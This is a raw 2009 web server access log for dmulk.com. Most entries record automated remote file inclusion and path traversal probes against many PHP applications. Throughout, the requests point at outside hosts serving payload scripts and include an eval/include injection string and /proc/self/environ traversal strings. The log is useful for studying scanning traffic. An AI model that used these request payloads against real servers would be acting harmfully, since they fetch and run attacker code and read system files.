63.247.65.114 - - [06/Jan/2009:08:48:13 -0800] "GET /logs/htmltonuke.php?filnavn=http://www.great21.co.kr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:08:48:14 -0800] "GET /logs/access_080518.log/htmltonuke.php?filnavn=http://www.great21.co.kr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:08:48:14 -0800] "GET /logs/access_080518.log/htmltonuke.php?filnavn=http://www.great21.co.kr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:08:48:14 -0800] "GET /logs/access_080602.log/htmltonuke.php?filnavn=http://www.great21.co.kr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:08:48:14 -0800] "GET /logs/access_080602.log/htmltonuke.php?filnavn=http://www.great21.co.kr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:08:48:15 -0800] "GET /htmltonuke.php?filnavn=http://www.great21.co.kr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:08:48:15 -0800] "GET /logs/htmltonuke.php?filnavn=http://www.great21.co.kr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:48:20 -0800] "GET /logs/index.php?option=com_joomlalib&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:48:20 -0800] "GET /index.php?option=com_joomlalib&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 95169 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.194.31 - - [06/Jan/2009:08:48:21 -0800] "GET /logs/access_080106.log/modifyform.html?code=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.194.31 - - [06/Jan/2009:08:48:22 -0800] "GET /modifyform.html?code=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.194.31 - - [06/Jan/2009:08:48:22 -0800] "GET /logs/modifyform.html?code=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.194.31 - - [06/Jan/2009:08:48:24 -0800] "GET /logs/access_080102.log/modifyform.html?code=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.174.114 - - [06/Jan/2009:08:48:53 -0800] "GET /htbin/shop.pl/page=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.174.114 - - [06/Jan/2009:08:48:53 -0800] "GET /logs/access_080507.log//htbin/shop.pl/page=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.174.114 - - [06/Jan/2009:08:48:53 -0800] "GET /logs//htbin/shop.pl/page=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.141.37.54 - - [06/Jan/2009:08:49:07 -0800] "GET /logs/access_071222.log//components/com_simpleboard/file_upload.php?sbp=http://h1.ripway.com/h4r4zuku/responz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.174.114 - - [06/Jan/2009:08:50:15 -0800] "GET /components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.174.114 - - [06/Jan/2009:08:50:16 -0800] "GET /logs/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.174.114 - - [06/Jan/2009:08:50:16 -0800] "GET /logs/access_081024.log/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.174.114 - - [06/Jan/2009:08:50:16 -0800] "GET /logs/access_081102.log/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
8.7.26.27 - - [06/Jan/2009:08:50:18 -0800] "GET /inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
8.7.26.27 - - [06/Jan/2009:08:50:18 -0800] "GET /logs/access_071213.log//inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
8.7.26.27 - - [06/Jan/2009:08:50:21 -0800] "GET /logs//inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
62.141.37.54 - - [06/Jan/2009:08:50:24 -0800] "GET /logs/access_080323.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://h1.ripway.com/h4r4zuku/responz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.89.90 - - [06/Jan/2009:08:50:34 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.rolandmatthews.org/gen/id.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.89.90 - - [06/Jan/2009:08:50:34 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.rolandmatthews.org/gen/id.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.89.90 - - [06/Jan/2009:08:50:34 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.rolandmatthews.org/gen/id.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
148.245.102.115 - - [06/Jan/2009:08:50:41 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.245.102.115 - - [06/Jan/2009:08:50:41 -0800] "GET /logs/access_080731.log%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.245.102.115 - - [06/Jan/2009:08:50:41 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.37.54 - - [06/Jan/2009:08:51:02 -0800] "GET /logs/access_080726.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.37.54 - - [06/Jan/2009:08:51:02 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.81.169 - - [06/Jan/2009:08:51:12 -0800] "GET /logs/access_071205.log HTTP/1.0" 200 50665 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:08:51:28 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.stormpages.com/wongdan/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:08:51:28 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.stormpages.com/wongdan/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:08:51:28 -0800] "GET /logs/access_080330.log/skin/zero_vote/ask_password.php?dir=http://www.stormpages.com/wongdan/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:08:51:30 -0800] "GET /logs/access_080330.log/skin/zero_vote/ask_password.php?dir=http://www.stormpages.com/wongdan/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:08:51:30 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.stormpages.com/wongdan/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:08:51:30 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.stormpages.com/wongdan/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.162.139.20 - - [06/Jan/2009:08:51:54 -0800] "GET /vwar//includes/functions_install.php?vwar_root=http://www.giovaniemissione.it/media/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
203.162.139.20 - - [06/Jan/2009:08:51:54 -0800] "GET /logs/access_081201.log/vwar//includes/functions_install.php?vwar_root=http://www.giovaniemissione.it/media/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
203.162.139.20 - - [06/Jan/2009:08:51:54 -0800] "GET /logs/vwar//includes/functions_install.php?vwar_root=http://www.giovaniemissione.it/media/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
203.162.139.20 - - [06/Jan/2009:08:51:55 -0800] "GET /logs/access_080522.log/vwar//includes/functions_install.php?vwar_root=http://www.giovaniemissione.it/media/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
203.162.139.20 - - [06/Jan/2009:08:51:55 -0800] "GET /logs/access_081201.log/vwar//includes/functions_install.php?vwar_root=http://www.giovaniemissione.it/media/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
203.162.139.20 - - [06/Jan/2009:08:51:55 -0800] "GET /vwar//includes/functions_install.php?vwar_root=http://www.giovaniemissione.it/media/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
203.162.139.20 - - [06/Jan/2009:08:51:55 -0800] "GET /logs/vwar//includes/functions_install.php?vwar_root=http://www.giovaniemissione.it/media/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
72.232.203.242 - - [06/Jan/2009:08:52:00 -0800] "GET /logs/access_080207.log//?path%5Bdocroot%5D=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.162.139.20 - - [06/Jan/2009:08:52:06 -0800] "GET /logs/access_080522.log/vwar//includes/functions_install.php?vwar_root=http://www.giovaniemissione.it/media/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
62.141.37.54 - - [06/Jan/2009:08:52:08 -0800] "GET /logs/access_080329.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.186.110.226 - - [06/Jan/2009:08:52:20 -0800] "GET /logs/access_081016.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.lph.go.th/main/SBU/RenovateWeb//appserv/COPYING.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.186.110.226 - - [06/Jan/2009:08:52:22 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.lph.go.th/main/SBU/RenovateWeb//appserv/COPYING.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.186.110.226 - - [06/Jan/2009:08:52:24 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.lph.go.th/main/SBU/RenovateWeb//appserv/COPYING.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:08:53:01 -0800] "GET /logs/access_080401.log/skin/zero_vote/ask_password.php?dir=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:08:53:01 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:08:53:01 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
72.172.213.99 - - [06/Jan/2009:08:53:07 -0800] "GET /includes/settings.inc.php?include_path=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:08:53:07 -0800] "GET /logs/access_080401.log/skin/zero_vote/ask_password.php?dir=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:08:53:07 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:08:53:07 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
77.222.40.42 - - [06/Jan/2009:08:53:09 -0800] "GET /errors.php?error=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.172.213.99 - - [06/Jan/2009:08:53:10 -0800] "GET /logs//includes/settings.inc.php?include_path=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.104.25 - - [06/Jan/2009:08:53:14 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.104.25 - - [06/Jan/2009:08:53:14 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
72.172.213.99 - - [06/Jan/2009:08:53:29 -0800] "GET /logs/access_080716.log//includes/settings.inc.php?include_path=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.172.213.99 - - [06/Jan/2009:08:53:29 -0800] "GET /logs/access_080912.log//includes/settings.inc.php?include_path=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:08:53:58 -0800] "GET /logs/access_081201.log/vwar//includes/functions_install.php?vwar_root=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:08:53:59 -0800] "GET /vwar//includes/functions_install.php?vwar_root=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:08:54:06 -0800] "GET /logs/access_080330.log/skin/zero_vote/ask_password.php?dir=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
203.162.139.20 - - [06/Jan/2009:08:54:10 -0800] "GET /logs/access_080723.log/vwar//includes/functions_install.php?vwar_root=http://www.giovaniemissione.it/media/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
64.1.215.164 - - [06/Jan/2009:08:54:11 -0800] "GET /logs/access_071126.log HTTP/1.0" 200 40511 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.dmulk.com"
203.162.139.20 - - [06/Jan/2009:08:54:16 -0800] "GET /logs/access_080723.log/vwar//includes/functions_install.php?vwar_root=http://www.giovaniemissione.it/media/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
200.101.192.223 - - [06/Jan/2009:08:54:38 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://secure.burtonhosting.com/billing//include/reports/include/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.101.192.223 - - [06/Jan/2009:08:54:38 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://secure.burtonhosting.com/billing//include/reports/include/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:08:54:45 -0800] "GET /logs/access_080330.log/skin/zero_vote/ask_password.php?dir=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:08:54:49 -0800] "GET /logs/access_080522.log/vwar//includes/functions_install.php?vwar_root=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:08:55:13 -0800] "GET /logs/access_081201.log/vwar//includes/functions_install.php?vwar_root=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:08:55:14 -0800] "GET /vwar//includes/functions_install.php?vwar_root=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:08:55:15 -0800] "GET /logs/vwar//includes/functions_install.php?vwar_root=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.120.7.229 - - [06/Jan/2009:08:55:23 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.120.7.229 - - [06/Jan/2009:08:55:23 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.120.7.229 - - [06/Jan/2009:08:55:23 -0800] "GET /logs/access_080903.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:08:55:34 -0800] "GET /logs/access_081201.log/vwar//includes/functions_install.php?vwar_root=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:08:55:35 -0800] "GET /vwar//includes/functions_install.php?vwar_root=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:08:55:36 -0800] "GET /logs/vwar//includes/functions_install.php?vwar_root=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.120.7.229 - - [06/Jan/2009:08:55:47 -0800] "GET /logs/access_081021.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.70.41 - - [06/Jan/2009:08:55:56 -0800] "GET /blog/wp-content/gallery/crestoc-2008/img_0084.jpg HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0" "dmulk.com"
219.254.35.166 - - [06/Jan/2009:08:56:10 -0800] "GET /logs/vwar//includes/functions_install.php?vwar_root=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:08:56:11 -0800] "GET /vwar//includes/functions_install.php?vwar_root=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.174.114 - - [06/Jan/2009:08:56:13 -0800] "GET /logs/access_080507.log%20%20//htbin/shop.pl/page=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.253.142.219 - - [06/Jan/2009:08:56:26 -0800] "GET /logs/access_081016.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.lph.go.th/main/SBU/RenovateWeb//appserv/COPYING.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:08:56:33 -0800] "GET /logs/vwar//includes/functions_install.php?vwar_root=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:08:56:38 -0800] "GET /vwar//includes/functions_install.php?vwar_root=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.127.68 - - [06/Jan/2009:08:57:08 -0800] "GET /home.php?pagina=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
211.115.127.68 - - [06/Jan/2009:08:57:08 -0800] "GET /logs/home.php?pagina=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
211.115.127.68 - - [06/Jan/2009:08:57:09 -0800] "GET /errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
211.115.127.68 - - [06/Jan/2009:08:57:09 -0800] "GET /logs/errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
211.115.127.68 - - [06/Jan/2009:08:57:09 -0800] "GET /home.php?pagina=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
211.115.127.68 - - [06/Jan/2009:08:57:09 -0800] "GET /logs/home.php?pagina=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
211.115.127.68 - - [06/Jan/2009:08:57:09 -0800] "GET /home.php?pagina=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
211.115.127.68 - - [06/Jan/2009:08:57:10 -0800] "GET /logs/home.php?pagina=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:08:57:31 -0800] "GET /logs/vwar//includes/functions_install.php?vwar_root=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:08:57:32 -0800] "GET /vwar//includes/functions_install.php?vwar_root=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
148.245.102.115 - - [06/Jan/2009:08:57:59 -0800] "GET /logs/access_080905.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.37.54 - - [06/Jan/2009:08:58:04 -0800] "GET /logs/access_080313.log//components/com_simpleboard/file_upload.php?sbp=http://h1.ripway.com/h4r4zuku/responz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.7.194.31 - - [06/Jan/2009:08:58:29 -0800] "GET /logs/access_071224.log%20/modifyform.html?code=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
